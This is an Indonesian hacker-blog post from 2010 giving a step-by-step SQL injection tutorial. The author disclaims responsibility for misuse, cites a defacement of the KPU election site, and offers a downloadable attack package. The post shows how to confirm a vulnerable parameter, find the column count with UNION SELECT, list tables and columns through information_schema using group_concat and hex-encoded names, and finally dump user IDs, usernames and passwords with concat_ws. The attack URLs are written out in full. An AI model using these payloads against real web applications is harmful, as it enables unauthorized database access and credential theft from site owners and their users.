dikz_n0ise

Sql Injection

Written on April 5, 2010 – 09:12 | by dikz_n0ise

Salam kenal dari saya untuk teman2 semua dan masyarakat undergr0und yang membaca artikel ini, tutorial kali ini yaitu tentang bug yg sangat nge-trend, dengan memanfaatkan bug ini situs KPU pernah dipermalukan , tetapi situs KPU bukan korban pertama dan satu-satunya dari bug ini, karena bnyak situs2 lain yang sudah di exploitasi oleh hacker/cracker dengan memanfaatkan bug ini, baik dengan tujuan developtment situs dari pihak yg bersangkutan ataupun aksi2 illegal dari pihak yg tidak bertanggung jawab..

Siapa nama bug tersebut??? yupzz anda benar,,!! dia adalah SQL Injection.. utk temen2 yg udh expert bukan maksud saya untuk menggurui kalian, Dengan rendah hati  disini penulis hanya ingin berbagi ilmu yang sedikit ini,, berharap dengan hal yg sepele/basic ini ilmu yang di dapatkan bisa bermanfaat buat temen2 semua (dlm hal yg positif),, Amien.
Segala tindak-tanduk yg di akibatkan dari  artikel ini penulis tidak bertanggung jawab lho y ,, karena saya hanya sharing aja, dan selanjutnya segala sesuatu tergantung dari para pembaca semua. Oya anda dapat mendownload paket yang saya gunakan disini, yang telah saya download dari situs Xshadow.

introduction :

OK kenapa SQL Injection bisa terjadi..??? Sebenernya SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.

langsung ke inti masalah

1. cara mengetahui situs yang vulnerable & mencari column count

berikan tanda “petik” diakhir URL situs target

# gambar 1

# gambar 2

contoh:
http://localhost/1/trainer.php?id=1′

bila kamu mengetahui situs tersebut vulnerable melalui tanda “petik”,or 1=1,etc . maka kamu harus menggunakan tanda minus,and 1=2,etc baru kemudian mengunakan union select dan add number (biasa disebut “column count “) sampai muncul angka pada web tersebut.

# gambar 3

contoh:
http://localhost/1/trainer.php?id=-1+union+select+1,2–

2. membaca table
cara query “group” yang digunakan untuk membaca table, berikut query yg digunakan

group_concat(table_name)

code diatas tadi dimasukkan disalah satu nomor yg didapatkan/yg muncul di browser, pada tutor ini, angka yang muncul adalah angka “1″ dan “2″, seperti pada gambar diatas. kemudian ditambahkan emblem di URL trakhir, berikut ini kode nya.

+from+information_schema.tables+where+table_schema=database()–

contoh:

http://localhost/1/trainer.php?id=-1+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()–

query diatas dimasukkan di no 2, setelah itu muncul table database seperti berikut:

# gambar 4

3. Membaca column table

setelah kita menemukan nama table, kita akan membuka atau membaca isi dari tabel tersebut , dengan query seperti ini:

group_concat(column_name)

tambahkan emblem seperti pada langkah sebelumnya di URL trakhir, seperti berikut:

+from+information_schema.columns+where+table_name=CODE%20EQUIVALENT%20HEX%20VALUE%20Table

Ok stop dlu,, perhatikan pada tulisan “CODE EQUIVALENT HEX VALUE Table” dimana tabel yg kita targetkan tadi adalah tabel ms_user, maka dari itu kita harus meng-convert (merubah) tulisan “ms_user” menjadi bilangan “HEXA”, pada langkah ini saya menggunkan “Net tools” yang kebetulan mempunyai fasilitas converter dari “ASCII” ke “HEXA”

contoh:
http://localhost/1/trainer.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x6D735F75736572–

hasil dari query diatas:

# gambar 5

4. Hasil akhir

selamat anda sudah sampai di langkah ini :04:  , setelah kita mendapatkan column count, nama table, dan membaca column table,, sekarang saatnya kita melihat isi column dari table ms_user

query yang digunakan seperti berikut:

concat_ws(column yg akan dibaca)

dan ditambahkan emblem diblakang URL, seperti berikut:

+from+nama kolom table yg akan dibaaca–

contoh :

http://localhost/1/trainer.php?id=-1+union+select+1,concat_ws(0x3a,user_id,username,password,full_name,position,status)+from+ms_user–

# gambar 6

akhirnya tutorial ini selesai ,, sorry y klo screen shoot nya jelek2 :04:  ,, untuk mendownload paket SQL Injection yang saya gunakan dlm tutor ini silakan di download disini. saya ucapkan terima kasih telah mengunjungi blog saya ,, semoga ilmu yg sedikit ini bisa menambah wawasan dan pengetahuan anda didunia hacking. Bila ada yg salah mohon maaf, semua itu karena semata-mata penulis hanyalah manusia biasa dan bkn seorang super hero di dunia cyber, melainkan hanya manusia biasa yg slalu ingn tahu akan ilmu pengetahuan.

r3g4rd’5 :
^dikz_n0ise^

th4nk5 t0:
#yogyafree – xcode.or.id #jasakom.com #e-c-h-o #Jubilee School Community #Xshadow #the_day

Popularity: 11% [?]

Tags: injection, sql injection, SQLi